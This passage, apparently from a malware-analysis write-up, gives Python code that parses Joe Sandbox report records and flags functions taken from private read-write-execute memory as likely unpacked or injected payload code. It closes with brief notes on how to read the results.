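• Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
Similarity
• API ID: Xinvalid_argument__std_exception_copystd::_
• String ID: map/set too long
• API String ID: 2536225881-558153379
• Instruction Fuzzy Hash: 35E06D71A11B04A0FB01AF21E8B42D86360D738754F98D222DD5C46361EA38D5E6C300
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SOURCE_RE = re.compile(r"Source File: (\S+\.sdmp), Offset: ([0-9A-Fa-f]+)(?:, based on PE: (\w+))?")

# Win32 MEMORY_BASIC_INFORMATION constants (documented values).
PAGE_EXECUTE_READWRITE = 0x40
MEM_IMAGE = 0x1000000


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)       # "APIs" bullets
    strings: list = field(default_factory=list)    # "Strings" bullets
    source_file: str = ""                          # .sdmp the function was lifted from
    associated: list = field(default_factory=list)
    offset: int = 0                                # region base the dump was rebased to
    based_on_pe: bool = False
    snapshot: str = ""
    meta: dict = field(default_factory=dict)       # API ID, String ID, Opcode ID, ...


def parse_records(text):
    """One record per 'APIs' heading; bullets are routed by the current heading."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            if line == "APIs":
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            cur.apis.append(body)
        elif section == "Strings":
            cur.strings.append(body)
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(body)
            if m:
                cur.source_file, cur.offset = m.group(1), int(m.group(2), 16)
                cur.based_on_pe = m.group(3) == "true"
            elif body.startswith("Associated: "):
                cur.associated.append(body[len("Associated: "):])
        elif section == "Joe Sandbox IDA Plugin" and body.startswith("Snapshot File: "):
            cur.snapshot = body[len("Snapshot File: "):]
        elif section == "Similarity":
            key, _, val = body.partition(":")
            cur.meta[key.strip()] = val.strip()
    return records


def decode_sdmp(name):
    """Split the dotted .sdmp name. ASSUMPTION (the page does not document the
    layout): fields are <process index>.<phase>.<dump id>.<base>.<protect>.<?>.<type>.<?>
    with 'protect' and 'type' holding the MEMORY_BASIC_INFORMATION values."""
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError("unexpected sdmp name: " + name)
    return {"proc": int(fields[0], 16), "phase": int(fields[1], 16),
            "base": int(fields[3], 16), "protect": int(fields[4], 16),
            "type": int(fields[6], 16)}


def is_private_rwx(info):
    """True for executable+writable memory that is not an image mapping: code there
    was written at run time (unpacked or injected), not loaded from the file on disk."""
    return info["type"] != MEM_IMAGE and (info["protect"] & 0xFF) == PAGE_EXECUTE_READWRITE


def flag_private_rwx(records):
    """Return the records whose source dump is private RWX memory."""
    return [r for r in records if is_private_rwx(decode_sdmp(r.source_file))]


if __name__ == "__main__":
    for r in flag_private_rwx(parse_records(SAMPLE)):
        print(hex(r.offset), r.meta.get("API ID"), r.meta.get("String ID"))
```

Run against the full function listing, the flagged set is the part of the report worth reading first: those functions were never in the submitted file, so their strings and API IDs describe the payload rather than the loader. The `TlsSetValue` record with string `FlsSetValue`, by contrast, is the ordinary MSVC runtime resolving `FlsSetValue` at start-up and falling back to `TlsSetValue`; it lives in the image and is not evidence of anything on its own.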